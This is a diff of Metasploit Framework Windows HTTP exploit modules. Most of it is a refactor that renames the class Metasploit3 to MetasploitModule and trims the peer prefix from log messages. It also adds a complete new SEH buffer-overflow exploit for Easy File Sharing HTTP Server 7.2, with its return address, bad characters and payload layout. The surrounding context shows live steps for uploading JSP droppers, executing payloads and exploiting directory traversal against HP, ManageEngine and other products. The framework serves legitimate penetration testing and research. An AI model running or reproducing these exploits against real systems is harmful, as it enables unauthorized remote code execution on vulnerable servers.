b/modules/exploits/windows/http/badblue_ext_overflow.rb index 64898f93cc..8ea6438d3a 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index ac84d2ff34..841642ef04 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 2119b57aab..f17d84ac56 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 6cf9e98863..e9fbfad2f7 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index df52e63683..58e78c7b8d 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index a314fa36cf..0f139255d0 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index 9f5251b4e1..05e2613719 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index c2bb5bdf61..4069ec878d 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index bc48f73fd8..9fa5c4cec3 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index eab4067731..2fb6931fe2 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote # Exploitation is reliable, but the service hangs and needs manual restarting. Rank = ManualRanking @@ -392,10 +392,10 @@ class Metasploit3 < Msf::Exploit::Remote end def primer - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end end @@ -433,10 +433,10 @@ class Metasploit3 < Msf::Exploit::Remote host = $1 share_name = $2 dll_name = $3 - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end else fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll') diff --git a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb index e0865db4c7..11dc34709f 100644 --- a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb +++ b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index 769d496259..4936809590 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 14427fd950..3ce543f576 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote path = File.dirname("#{target_uri.path}/.") b64_version = get_version(path) if b64_version.empty? - vprint_error("#{peer} - Unable to determine the version number") + vprint_error("Unable to determine the version number") else b64_version = Rex::Text.decode_base64(b64_version) if b64_version =~ /^[0-6]\.1/ @@ -131,11 +131,11 @@ class Metasploit3 < Msf::Exploit::Remote # b64_version = get_version(path) if b64_version.empty? - print_error("#{peer} - Unable to determine the version number") + print_error("Unable to determine the version number") return end - print_status("#{peer} - Obtained version: #{Rex::Text.decode_base64(b64_version)}") + print_status("Obtained version: #{Rex::Text.decode_base64(b64_version)}") # # Prepare our payload (naughty exe embedded in php) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Inject payload # - print_status("#{peer} - Injecting PHP payload...") + print_status("Injecting PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => path, @@ -163,10 +163,10 @@ class Metasploit3 < Msf::Exploit::Remote # # Load our payload # - print_status("#{peer} - Loading payload: #{path}#{b64_version}/#{@php_fname}") + print_status("Loading payload: #{path}#{b64_version}/#{@php_fname}") send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"}) if res and res.code == 404 - print_error("#{peer} - Server returned 404, the upload attempt probably failed.") + print_error("Server returned 404, the upload attempt probably failed.") return end diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 040045c4b4..ea7669bbee 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -83,15 +83,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(dropper_filename), diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 4534cad6c1..ab88da7094 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -61,15 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(exe_filename) register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}") - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(jsp_name), diff --git a/modules/exploits/windows/http/easyfilesharing_seh.rb b/modules/exploits/windows/http/easyfilesharing_seh.rb new file mode 100644 index 0000000000..4da86d6373 --- /dev/null +++ b/modules/exploits/windows/http/easyfilesharing_seh.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow', + 'Description' => %q{ + This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. + }, + 'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '39008' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 390, + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ], + ], + 'DefaultOptions' => { + 'RPORT' => 80 + }, + 'DisclosureDate' => 'Dec 2 2015', + 'DefaultTarget' => 0)) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def exploit + connect + print_status("Sending exploit...") + sploit = "GET " + sploit << rand_text_alpha_upper(4061) + sploit << generate_seh_record(target.ret) + sploit << make_nops(19) + sploit << payload.encoded + sploit << make_nops(7) + sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) + sploit << " HTTP/1.0\r\n\r\n" + sock.put(sploit) + print_good("Exploit Sent") + handler + disconnect + end +end diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index c7ef5b6ee7..0def8e6474 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] } diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index 7daa7bff70..9dd6288406 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index ff37a76faa..b6b34663cd 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 06e9747b3f..6d763d06ed 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] } @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if not version return Exploit::CheckCode::Safe end - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version !~ /^(2\.\d|3\.0|3\.1)$/ return Exploit::CheckCode::Safe end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote if not path return Exploit::CheckCode::Detected end - vprint_status "#{peer} - Found path: #{path}" + vprint_status "Found path: #{path}" return Exploit::CheckCode::Appears end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote # get target if target.name =~ /Automatic/ version = get_version - vprint_status "#{peer} - Found version: #{version}" if version + vprint_status "Found version: #{version}" if version if not version or version !~ /^(2\.\d|3\.0|3\.1)$/ fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") elsif version =~ /(2\.0)/ @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path") end path << "\\users\\" - vprint_status "#{peer} - Using path: #{path}" + vprint_status "Using path: #{path}" # send payload sploit = rand_text_alpha(256 - path.length) sploit << generate_seh_payload(my_target.ret) - print_status "#{peer} - Sending request (#{sploit.length} bytes) to target (#{my_target.name})" + print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})" send_request_cgi({ 'uri' => '/chat.ghp', 'encode_params' => false, diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index ab43eac27d..1ddad4cad6 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # Reliable memory corruption include Msf::Exploit::Remote::HttpClient @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => '/whatsnew.txt'}) if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ version = $1 - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ version = $1 - vprint_status "#{peer} - Based on Server header: #{version}" + vprint_status "Based on Server header: #{version}" end version @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get target version to determine how to reach call/jmp esp # - print_status("#{peer} - Fingerprinting version...") + print_status("Fingerprinting version...") version = get_version if target.name =~ /Automatic/ @@ -118,11 +118,11 @@ class Metasploit3 < Msf::Exploit::Remote elsif version =~ /4\.0/ my_target = targets[2] end - print_good("#{peer} - Version #{version} found") + print_good("Version #{version} found") else my_target = target unless version && my_target.name.include?(version) - print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...") + print_error("The selected target doesn't match the detected version, trying anyway...") end end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0x1002466D].pack("V") # Push eax > retn sploit << payload.encoded - print_status "#{peer} - Trying target #{my_target.name}..." + print_status "Trying target #{my_target.name}..." # # NOTE: Successful HTTP request is required to trigger diff --git a/modules/exploits/windows/http/ektron_xslt_exec.rb b/modules/exploits/windows/http/ektron_xslt_exec.rb index 3288d2c0d2..807f2ad8f2 100644 --- a/modules/exploits/windows/http/ektron_xslt_exec.rb +++ b/modules/exploits/windows/http/ektron_xslt_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index a69621f8e8..6693c11399 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending malformed request...") + print_status("Sending malformed request...") send_request_raw({ 'method' => 'GET', 'uri' => exploit_uri, diff --git a/modules/exploits/windows/http/ezserver_http.rb b/modules/exploits/windows/http/ezserver_http.rb index 772d2e31aa..4b704d325e 100644 --- a/modules/exploits/windows/http/ezserver_http.rb +++ b/modules/exploits/windows/http/ezserver_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 6a396493ac..ba762f52b5 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" ) diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 04c5ae4b94..0e80b7fef6 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = target_uri.to_s sploit << unc - print_status("#{peer} - Trying to ") + print_status("Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index ab30446ec0..2e0e944341 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote dropper = jsp_drop_bin(war, war_traversal) dropper_filename = rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...") + print_status("Uploading the JSP dropper #{dropper_filename}...") # The JSP, by default, is uploaded to: # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\ # In order to execute it, through the AutoPass application we would like to drop it here: @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote res.body.to_s.include?("java.lang.NullPointerException") && res.body.to_s.include?("com.hp.autopass") - print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...") + print_error("Unexpected response... upload maybe failed, trying anyway...") end res = send_request_cgi({ @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Unexpected response after executing the dropper...") + print_error("Unexpected response after executing the dropper...") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"), diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 8a17371a60..4396f25703 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri("/", "upload", "upload"), 'method' => 'PUT', @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri("/", "upload", jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index e468efc285..169532851f 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'method' => 'POST', @@ -96,13 +96,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index c9fdac58ba..50e1585296 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } @@ -109,11 +109,11 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - vprint_status("#{peer} - Detecting tomcat version...") + vprint_status("Detecting tomcat version...") tomcat_version = get_tomcat_version if tomcat_version - print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...") + print_status("Tomcat #{tomcat_version} detected... Verifying traversal...") location = "" location << install_path location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/") @@ -122,19 +122,19 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - vprint_good("#{peer} - Traversal exists and parameters are correct...") + vprint_good("Traversal exists and parameters are correct...") return Exploit::CheckCode::Vulnerable elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - vprint_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") + vprint_warning("Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") return Exploit::CheckCode::Appears else - vprint_status("#{peer} - Failed to verify the directory traversal...") + vprint_status("Failed to verify the directory traversal...") end else - vprint_error("#{peer} - Tomcat version not detected...") + vprint_error("Tomcat version not detected...") end - vprint_status("#{peer} - Checking if the vulnerable web service and method exist...") + vprint_status("Checking if the vulnerable web service and method exist...") res = send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'), 'vars_get' => { 'wsdl' => 1 } @@ -151,16 +151,16 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - print_status("#{peer} - Retrieving the Tomcat version used...") + print_status("Retrieving the Tomcat version used...") tomcat_version = get_tomcat_version if tomcat_version.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used") else - print_good("#{peer} - Tomcat #{tomcat_version} found") + print_good("Tomcat #{tomcat_version} found") end - print_status("#{peer} - Verifying parameters to exploit the directory traversal...") + print_status("Verifying parameters to exploit the directory traversal...") brute_force = false location = "" location << install_path @@ -170,37 +170,37 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - print_good("#{peer} - Traversal parameters are correct") + print_good("Traversal parameters are correct") elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...") + print_error("Traversal parameters are incorrect, will try to brute force depth...") brute_force = true else fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters") end if brute_force - print_status("#{peer} - Trying to brute force the traversal depth...") + print_status("Trying to brute force the traversal depth...") depth = brute_force_depth(location) if depth.nil? fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH") end - print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...") + print_good("Using #{depth} as depth length to exploit the traversal...") end jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working 